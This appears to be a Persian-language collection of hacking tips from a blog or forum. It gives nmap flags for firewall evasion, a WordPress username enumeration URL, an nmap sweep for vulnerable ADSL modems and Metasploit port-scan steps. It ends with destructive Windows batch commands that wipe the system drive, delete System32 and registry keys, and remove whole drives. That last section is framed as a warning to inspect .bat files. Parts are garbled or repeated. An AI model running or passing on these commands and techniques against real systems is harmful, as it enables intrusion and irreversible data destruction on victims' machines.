مجموعه ارگومان های ابزار nmap برای بایپس فایروال ها
مجموعه ارگومان های ابزار nmap برای بایپس فایروال ها
-D IP_Addresses hosts
-g port_number Spoof port
-f Fragment packets
مجموعه ارگومان های ابزار nmap برای بایپس فایروال ها
-D IP_Addresses hosts
-g port_number Spoof port
-f Fragment packets
آموزش پیدا کردن username سایت های وردپرسی
این روش میشه گفت رو همه سایت های وردپرسی جواب میده.
کافیه این خط رو به اخر آدرس سایت اضافه کنید؛ یک سری اطلاعت را نمایش میدهد که جلوی name، نام کاربری مورد نظر را می توانید مشاهده کنید.
/wp-json/wp/v2/users
مثال:
domain.com/wp-json/wp/v2/users
دستور مهم ابزار nmap برای پیدا کردن آسیب پذیری مودم های adsl
nmap -sS -sV -vv -n -Pn -T5 192.168.1.1-255 -p80 -oG - | grep "open"
اسکن پورت های یک سیستم در متااسپلویت
ترمینال را باز کنید.
1- استارت سرویس postgresql
service postgresql start
2- اجرا کردن متااسپلویت
msfconsole
3- فراخوانی ماژول پورت اسکنر
use auxiliary/scanner/portscan/tcp
4- چک کردن تنظیمات ماژول
show optinos
5- ست کردن پورت هایی که باید اسکن شوند
set PORTS 1-500
6- ست کردن ای پی تارگت
set RHOST 192.168.1.1
7- اجرا کردن اسکن
exploit
کدهای مخرب محیط CMD ویندوز
-> این کدها از مخرب ترین کدهای ویندوزی هستند که ممکن هست نفوذگر آن را به اسم یک فایل مفید در قالب Bat. در اختیار شما بگذارد.
پس بهتر است که قبل از اجرا فایل های با فرمت Bat حتما آن را با یک Editor باز کرده و کدهای آن را آنالیز کنید!
فرمت و یا پاک کردن کل هارد و آسیب رسانی به آن:
off
del %systemdrive%\*.*/f/s/q
shutdown –r –f –t 00"
حذف فایل مهم سیستمی "System32":
c:\WINDOWS\SYSTEM32\*.*/q
حذف تمامی ریجستری ها:
OFF
START reg delete HKCR/.EXE
START reg delete HKCR/.dll
START reg delete HKCR/*
فرمت درایو ها (خودتون میتونید تغییرشون دهید):
D:\
rd/s/q C:\
rd/s/q E:\